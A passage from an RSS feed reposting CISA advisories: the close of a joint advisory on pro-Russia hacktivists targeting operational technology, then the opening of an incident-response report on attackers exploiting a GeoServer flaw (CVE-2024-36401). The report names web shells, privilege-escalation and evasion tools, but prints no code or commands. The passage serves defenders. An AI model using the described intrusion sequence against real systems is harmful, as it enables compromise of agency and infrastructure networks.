<li><strong>Refer to the joint&nbsp;</strong><a href="https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators" title="Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators"><strong>Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators</strong></a> to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected.</li>
</ul>
</li>
<li><strong>Ensure OT assets use robust authentication procedures.</strong>
<ul>
<li>Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques.</li>
<li>Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#ChangingDefaultPasswords2A" title="CPG 2.A">CPG 2.A</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MinimumPasswordStrength2B" title="CPG 2.B">CPG 2.B</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#UniqueCredentials2C" title="CPG 2.C">CPG 2.C</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>].</li>
<li>Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectionofUnsuccessfulAutomatedLoginAttempts2G" title="CPG 2.G">CPG 2.G</a>].</li>
<li>Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#ProhibitConnectionofUnauthorizedDevices2V" title="CPG 2.V">CPG 2.V</a>].</li>
<li>Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems.</li>
</ul>
</li>
<li><strong>Enable control system security features&nbsp;</strong>that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="CPG 2.E">CPG 2.E</a>].</li>
<li><strong>Implement and practice business recovery/disaster recovery plans.</strong> Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation.
<ul>
<li>Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentPlanningandPreparedness5A" title="CPG 5.A">CPG 5.A</a>].</li>
<li>Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="CPG 2.R">CPG 2.R</a>].</li>
</ul>
</li>
<li><strong>Collect and monitor the traffic of OT assets and networking devices.</strong> This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs.</li>
<li><strong>Review configurations for setpoint ranges or tag values&nbsp;</strong>to stay within safe ranges and establish alerting for deviations.</li>
<li><strong>Take a proactive approach in the procurement process</strong> by following the guidance outlined in the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products</a>.</li>
</ul>
<h3>OT Device Manufacturers</h3>
<p>Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a>.</p>
<ul>
<li><strong>Eliminate default credentials and require strong passwords.</strong> The use of default credentials is a top weakness threat actors exploit to gain access to systems.</li>
<li><strong>Mandate MFA for privileged users.</strong> Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost.</li>
<li><strong>Practice secure by default principles.&nbsp;</strong>OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.
<ul>
<li><strong>Include logging at no additional charge.</strong> Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats.</li>
</ul>
</li>
<li><strong>Publish Software Bill of Materials (SBOMs).</strong> Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s <a href="https://www.cisa.gov/sbom" title="Software Bill of Materials">SBOM webpage</a> for more information.</li>
</ul>
<p>Additionally, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber" title="Secure by Design Alert">Secure by Design Alert</a> on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage.</p>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&amp;CK techniques described in this advisory.</p>
<p>To start:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <a href="#Table1" title="Table 1"><strong>Table 1</strong></a> to<strong> </strong><a href="#Table10" title="Table 10"><strong>Table 10</strong></a>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<p>Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:</p>
<ul>
<li>CISA, EPA, NSA, FBI, ASD’s ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ’s <a href="https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators" title="Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators">Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators</a> offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected.</li>
<li>CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK’s guidance on <a href="https://www.cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity" title="Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity">Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity</a> that can help organizations protect OT systems from pro-Russia hacktivist activity.</li>
<li>NSA and CISA’s guidance on <a href="https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF" target="_blank" title="Control System Defense: Know the Opponent">Control System Defense: Know the Opponent</a> helps organizations defend OT and ICS assets against malicious cyber activity.</li>
<li>CISA and EPA’s resource page on <a href="https://www.cisa.gov/water" title="Water and Wastewater Cybersecurity">Water and Wastewater Cybersecurity</a> to help organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems.
<ul>
<li>For additional guidance, see CISA, EPA, and FBI’s fact sheet on <a href="https://www.cisa.gov/resources-tools/resources/top-cyber-actions-securing-water-systems" title="Top Cyber Actions for Securing Water Systems">Top Cyber Actions for Securing Water Systems</a>.</li>
</ul>
</li>
<li>The Food and Ag-ISAC’s best practices on <a href="https://www.idfa.org/wordpress/wp-content/uploads/2023/07/Food-and-Ag-ISAC-Cybersecurity-Guide-2023_IDFA.pdf" target="_blank" title="Food and Ag Cybersecurity: A Guide for Small &amp; Medium Enterprises">Food and Ag Cybersecurity: A Guide for Small &amp; Medium Enterprises</a> provides recommendations to help mitigate against cyber threats.</li>
<li>DOE and National Association of Regulatory Utility Commissioners <a href="https://www.naruc.org/core-sectors/critical-infrastructure-and-cybersecurity/cybersecurity-for-utility-regulators/cybersecurity-baselines/" target="_blank" title="Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)">Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)</a> webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators to help mitigate cybersecurity risks.</li>
</ul>
<p>Additional resources that apply to this advisory include:</p>
<ul>
<li>EPA’s <a href="https://www.epa.gov/cyberwater/epa-cybersecurity-water-sector" target="_blank" title="Cybersecurity for the Water Sector">Cybersecurity for the Water Sector</a> resource page provides organizations with guidance on implementing basic cyber hygiene practices.</li>
<li>CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> enables critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques.</li>
<li>CISA’s <a href="https://www.cisa.gov/audiences/small-and-medium-businesses/secure-your-business/require-strong-passwords" title="Require Strong Passwords">Require Strong Passwords</a> webpage supports small and medium-sized businesses mitigating against malicious cyber activity that targets weak passwords.</li>
<li>CISA, NSA, FBI, EPA, TSA, and international partners’ guidance <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products</a>.</li>
<li>DOE’s guidance on <a href="https://www.energy.gov/ceser/cyber-informed-engineering" target="_blank" title="Cyber-Informed Engineering">Cyber-Informed Engineering</a> recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems.</li>
<li>CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> help enable critical infrastructure organizations to reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors.</li>
<li>CISA, NSA, FBI, and international partners’ guidance on <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a> urges software manufacturers to provide customers with products that are safer and more secure.
<ul>
<li>See more information in these Secure by Design Alerts: <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-manufacturers-can-protect-customers-eliminating-default-passwords" title="How Manufacturers Can Protect Customers by Eliminating Default Passwords">How Manufacturers Can Protect Customers by Eliminating Default Passwords</a> and <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber" title="How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity">How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity</a>.</li>
</ul>
</li>
</ul>
<h2><a class="ck-anchor" id="Contact"><strong>Contact Information</strong></a></h2>
<p><strong>U.S. organizations</strong> are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:</p>
<ul>
<li>Contact CISA via CISA’s 24/7 Operations Center at <a href="mailto:contact@cisa.dhs.gov" title="contact@cisa.dhs.gov">contact@cisa.dhs.gov</a> or 1-844-Say-CISA (1-844-729-2472) or your local <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="FBI field office">FBI field office</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
<li>For NSA cybersecurity guidance inquiries, contact <a href="mailto:CybersecurityReports@nsa.gov" target="_blank" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a>.</li>
</ul>
<p><strong>Australian organizations:</strong> Visit <a href="https://www.cyber.gov.au/" target="_blank" title="cyber.gov.au">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</p>
<p><strong>Canadian organizations:</strong> Report incidents by emailing Cyber Centre at <a href="mailto:contact@cyber.gc.ca" target="_blank" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p>
<p><strong>New Zealand organizations:</strong> Report cyber security incidents to <a href="mailto:incidents@ncsc.govt.nz" target="_blank" title="incidents@ncsc.govt.nz">incidents@ncsc.govt.nz</a> or call 04 498 7654.</p>
<p><strong>United Kingdom organizations:</strong> Report a significant cyber security incident: <a href="https://report.ncsc.gov.uk/" target="_blank" title="report.ncsc.gov.uk">report.ncsc.gov.uk</a> (monitored 24 hours) or, for urgent assistance, call 03000 200 973.</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products,&nbsp;processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p><strong>December 09, 2025:</strong> Initial version.</p>
<h2><strong>Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups</strong></h2>
<p>For further information on targeting methodologies for pro-Russia hacktivist groups, see:</p>
<ul>
<li>CISA’s alert <a href="https://www.cisa.gov/news-events/alerts/2025/05/06/unsophisticated-cyber-actors-targeting-operational-technology" title="Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology">Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology</a>;</li>
<li>The joint fact sheet <a href="https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology" title="Primary Mitigations to Reduce Cyber Threats to Operational Technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a>; and</li>
<li>CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia" title="Russia Cyber Threat">Russia Cyber Threat</a> webpage.</li>
</ul>
<h2><a class="ck-anchor" id="AppB"><strong>Appendix B: Additional Designators Used for Cited Groups</strong></a></h2>
<p>The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory.</p>
<p><strong>Note:</strong> Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings.</p>
<ul>
<li>GRU military unit 74455
<ul>
<li>Sandworm Team</li>
<li>Voodoo Bear</li>
<li>Seashell Blizzard</li>
<li>APT44</li>
</ul>
</li>
<li>Cyber Army of Russia Reborn (CARR)
<ul>
<li>CyberArmy of Russia</li>
<li>Народная&nbsp;CyberАрмия&nbsp;(НКА)</li>
<li>People’s CyberArmy of Russia (PCA)</li>
<li>Russian CyberArmy Team (RCAT)</li>
</ul>
</li>
<li>NoName057(16)
<ul>
<li>NoName057(16) Spain</li>
<li>NoName057(16) Italy</li>
<li>NoName057(16) France</li>
</ul>
</li>
<li>Z-Pentest
<ul>
<li>Z-Pentest Beograd</li>
<li>Z-Pentest Alliance</li>
<li>Z-Alliance</li>
</ul>
</li>
</ul>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CISA Shares Lessons Learned from an Incident Response Engagement</title>
		<link>http://disensogroup.com/cisa-shares-lessons-learned-from-an-incident-response-engagement/</link>
		<comments>http://disensogroup.com/cisa-shares-lessons-learned-from-an-incident-response-engagement/#comments</comments>
		<pubDate>Mon, 22 Sep 2025 15:12:49 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/cisa-shares-lessons-learned-from-an-incident-response-engagement/</guid>
		<description><![CDATA[Advisory at a Glance Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate...]]></description>
				<content:encoded><![CDATA[<h2><strong>Advisory at a Glance</strong></h2>
<table>
<tbody>
<tr>
<td>Executive Summary</td>
<td>CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.</td>
</tr>
<tr>
<td>Key Actions</td>
<td>
<ul>
<li><strong>Prevent compromise</strong> by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.</li>
<li><strong>Prepare for incidents</strong> by maintaining, practicing, and updating incident response plans.</li>
<li><strong>Prepare for incidents</strong> by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.</li>
</ul>
</td>
</tr>
<tr>
<td>Indicators of Compromise&nbsp;</td>
<td>
<p>For a downloadable copy of indicators of compromise, see:&nbsp;</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json" title="JSON AA25-266A">AA25-266A-JSON.stix_.json</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml" title="STIX AA25-266A">AA25-266A-STIX.stix_.xml</a></li>
</ul>
</td>
</tr>
<tr>
<td>Intended Audience</td>
<td>
<p><strong>Organizations:</strong> FCEB agencies and critical infrastructure organizations.</p>
<p><strong>Roles:</strong> <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity" title="Defensive Cybersecurity Analysts">Defensive Cybersecurity Analysts</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/vulnerability-analysis" title="Vulnerability Analysts">Vulnerability Analysts</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-management" title="Security Systems Managers">Security Systems Managers</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-analysis" title="Systems Security Analysts">Systems Security Analysts</a>, and <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-policy-and-planning" title="Cybersecurity Policy and Planning Professionals">Cybersecurity Policy and Planning Professionals</a>.</p>
</td>
</tr>
<tr>
<td>Download the PDF version of this report</td>
<td><a class="c-button c-button--on-dark c-button--download" href="https://www.cisa.gov/sites/default/files/2025-09/AA25_266A_advisory_cisa_shares_lessons_learned_from_ir_engagement.pdf" title="PDF CISA Shares Lessons Learned from an Incident Response Engagement">AA25-266A advisory cisa shares lessons learned from ir engagement</a></td>
</tr>
</tbody>
</table>
<h2><strong>Introduction</strong></h2>
<p><em>The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.</em></p>
<p>CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.</p>
<p>Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see <a href="#Lessons%20Learned" title="Lessons Learned"><strong>Lessons Learned</strong></a> for more details):</p>
<ol>
<li><strong>Vulnerabilities were not promptly remediated.</strong>
<ol>
<li>The cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> for initial access on two GeoServers.</li>
<li>The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.</li>
</ol>
</li>
<li><strong>The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.</strong>
<ol>
<li>This delayed&nbsp;certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.</li>
</ol>
</li>
<li><strong>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.</strong>
<ol>
<li>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.</li>
</ol>
</li>
</ol>
<p>These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the <a href="#Mitigations" title="Mitigations"><strong>Mitigations</strong></a> section of this advisory to improve their security posture.</p>
<p>This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:</p>
<div>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json" title="JSON AA25-266A">AA25-266A-JSON.stix_.json</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml" title="STIX AA25-266A">AA25-266A-STIX.stix_.xml</a></li>
</ul>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATTACK Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See the <a href="#MITRE%20ATT&amp;CK%20Tactics%20and%20Techniques" title="MITRE ATT&amp;CK Tactics and Techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Threat Actor Activity</h3>
<p>CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.</p>
<p>During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE 2024-36401">CVE 2024-36401</a> [<a href="https://cwe.mitre.org/data/definitions/95.html" target="_blank" title="CWE-95: Eval Injection">CWE-95: “Eval Injection”</a>] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions <a href="#GeoServer" title="Footnote Reference 1"><sup>[1]</sup></a>. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities (KEV) Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a> on July 15, 2024.)</p>
<p>After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as <a href="https://attack.mitre.org/software/S0020/" target="_blank" title="China Chopper">China Chopper</a>, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="living off the land (LOTL)">living off the land (LOTL)</a> techniques.</p>
<p>See <a href="#Figure%C2%A01.%20Overview%20of%20Threat%20Actor%20Activity" title="Figure&nbsp;1. Overview of Threat Actor Activity"><strong>Figure 1</strong></a> for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.</p>
<p><a class="ck-anchor" id="Figure&nbsp;1. Overview of Threat Actor Activity">Figure&nbsp;1. Overview of Threat Actor Activity</a></p>
<figure class="c-figure c-figure--large c-figure--image" role="group">
<div class="c-figure__media">  <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-09/Overview%20of%20Threat%20Actor%20Activity.jpg?itok=uRWN4aW3" width="924" height="457" alt="Image outlining threat actor activity"></p>
</div>
</figure>
<h3>Reconnaissance</h3>
<p>The cyber threat actors identified <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [<a href="https://attack.mitre.org/versions/v17/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a>]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.</p>
<h3>Resource Development</h3>
<p>The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [<a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a>].</p>
<h3>Initial Access</h3>
<p>To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE 2024-36401">CVE 2024-36401</a> [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the <code>.js</code> file returning <code>404</code> responses in the web logs, indicating that the server could not find the requested URL.</p>
<h3>Persistence</h3>
<p>The cyber threat actors primarily used web shells [<a href="https://attack.mitre.org/versions/v17/techniques/T1505/003/" target="_blank" title="T1505.003">T1505.003</a>] on internet-facing hosts, along with <code>cron</code> jobs (scheduled commands that run automatically at specified times) [<a href="https://attack.mitre.org/versions/v17/techniques/T1053/003/" target="_blank" title="T1053.003">T1053.003</a>], and valid accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.</p>
<h3>Privilege Escalation</h3>
<p>The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool <a href="#dirtycow" title="Footnote Reference 2"><sup>[2]</sup></a>, which can be used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2016-5195" target="_blank" title="CVE-2016-5195">CVE-2016-5195</a> [<a href="https://cwe.mitre.org/data/definitions/362.html" target="_blank" title="CWE-362: Race Condition">CWE-362: “Race Condition”</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a>]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).</p>
<p><strong>Note: </strong><a href="https://www.cve.org/CVERecord?id=CVE-2016-5195" target="_blank" title="CVE-2016-5195">CVE-2016-5195</a> affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.</p>
<h3>Defense Evasion</h3>
<p>To evade detection, the cyber threat actors employed indirect command execution via <code>.php</code> web shells and <code>xp_cmdshell</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1202/" target="_blank" title="T1202">T1202</a>] and abused Background Intelligence Transfer Service (BITS) jobs [<a href="https://attack.mitre.org/versions/v17/techniques/T1197/" target="_blank" title="T1197">T1197</a>]. CISA also observed files on GeoServer 1 named <code>RinqQ.exe</code> and <code>RingQ.rar</code>, which likely refer to a publicly available defense evasion tool called RingQ <a href="#RingQ" title="Footnote Reference 3"><sup>[3]</sup></a>, that the cyber threat actors staged for potential use.</p>
<p><strong>Note: </strong>CISA could not recover most of the files on the host to confirm their contents.</p>
<h3>Credential Access</h3>
